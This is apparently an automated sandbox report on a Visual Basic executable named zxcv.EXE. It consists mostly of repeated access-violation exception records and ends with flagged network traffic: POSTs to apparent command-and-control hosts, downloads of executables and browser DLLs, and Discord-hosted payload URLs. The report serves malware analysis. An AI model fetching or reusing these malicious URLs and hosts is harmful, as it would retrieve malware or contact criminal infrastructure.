RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191a
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6426
exception.address: 0x40191a
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191b
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6427
exception.address: 0x40191b
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191c
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6428
exception.address: 0x40191c
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191d
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6429
exception.address: 0x40191d
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191e
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6430
exception.address: 0x40191e
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x191f
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6431
exception.address: 0x40191f
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1920
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6432
exception.address: 0x401920
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1921
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6433
exception.address: 0x401921
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1922
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6434
exception.address: 0x401922
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1923
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6435
exception.address: 0x401923
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1924
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6436
exception.address: 0x401924
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1925
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6437
exception.address: 0x401925
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
exception.symbol: zxcv+0x1926
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6438
exception.address: 0x401926
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec
exception.symbol: zxcv+0x1927
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6439
exception.address: 0x401927
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00
exception.symbol: zxcv+0x1928
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6440
exception.address: 0x401928
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00
exception.symbol: zxcv+0x1929
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6441
exception.address: 0x401929
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00
exception.symbol: zxcv+0x192a
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6442
exception.address: 0x40192a
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00
exception.symbol: zxcv+0x192b
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6443
exception.address: 0x40192b
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00
exception.symbol: zxcv+0x192c
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6444
exception.address: 0x40192c
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00
exception.symbol: zxcv+0x192d
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6445
exception.address: 0x40192d
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
zxcv+0x241e @ 0x40241e
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77799ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77799ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00 00
exception.symbol: zxcv+0x192e
exception.instruction: add byte ptr [eax], al
exception.module: zxcv.EXE
exception.exception_code: 0xc0000005
exception.offset: 6446
exception.address: 0x40192e
registers.esp: 1637384
registers.edi: 0
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 41682900
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://34.89.184.90/
suspicious_features POST method with no referer header suspicious_request POST http://erolasa.ac.ug/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/softokn3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/92d554b38e1cae759d4c0d30ca20cfdc6cde1f5f
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/sqlite3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/freebl3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/41412bfae75d7e94b63598d20cc59c28b5b0423e
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/mozglue.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/msvcp140.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/nss3.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ac.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/rc.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds2.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/cc.exe
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/vcruntime140.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/main.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://erolbasa.ac.ug/
suspicious_features GET method with no useragent header suspicious_request GET https://telete.in/brikitiki
request POST http://34.89.184.90/
request POST http://erolasa.ac.ug/index.php
request POST http://erolbasa.ac.ug/softokn3.dll
request GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/92d554b38e1cae759d4c0d30ca20cfdc6cde1f5f
request POST http://erolbasa.ac.ug/sqlite3.dll
request POST http://erolbasa.ac.ug/freebl3.dll
request GET http://34.89.184.90//l/f/K-R3vHoBagrSXdgRybk2/41412bfae75d7e94b63598d20cc59c28b5b0423e
request POST http://erolbasa.ac.ug/mozglue.dll
request POST http://erolbasa.ac.ug/msvcp140.dll
request GET http://erolasa.ac.ug/ac.exe
request GET http://erolasa.ac.ug/rc.exe
request GET http://erolasa.ac.ug/ds1.exe
request GET http://erolasa.ac.ug/ds2.exe
request GET http://erolasa.ac.ug/cc.exe
request POST http://erolbasa.ac.ug/nss3.dll
request GET http://185.215.113.77/ac.exe
request GET http://185.215.113.77/rc.exe
request GET http://185.215.113.77/ds1.exe
request GET http://185.215.113.77/ds2.exe
request GET http://185.215.113.77/cc.exe
request POST http://erolbasa.ac.ug/vcruntime140.dll
request POST http://erolbasa.ac.ug/main.php
request POST http://erolbasa.ac.ug/
request GET https://telete.in/brikitiki
request GET https://cdn.discordapp.com/attachments/854297276549169165/865182381597786132/Rtzvmiumkiajmdtugitkgokalwbndbk
request GET https://cdn.discordapp.com/attachments/854297276549169165/865183364520345620/Ghvhklnnbujpcdbcuiamjnfnpsbioew
request POST http://34.89.184.90/
request POST http://erolasa.ac.ug/index.php
request POST http://erolbasa.ac.ug/softokn3.dll
request POST http://erolbasa.ac.ug/sqlite3.dll
request POST http://erolbasa.ac.ug/freebl3.dll
request POST http://erolbasa.ac.ug/mozglue.dll
request POST http://erolbasa.ac.ug/msvcp140.dll
request POST http://erolbasa.ac.ug/nss3.dll
request POST http://erolbasa.ac.ug/vcruntime140.dll
request POST http://erolbasa.ac.ug/main.php
request POST http://erolbasa.ac.ug/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2424
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74612000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2424
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
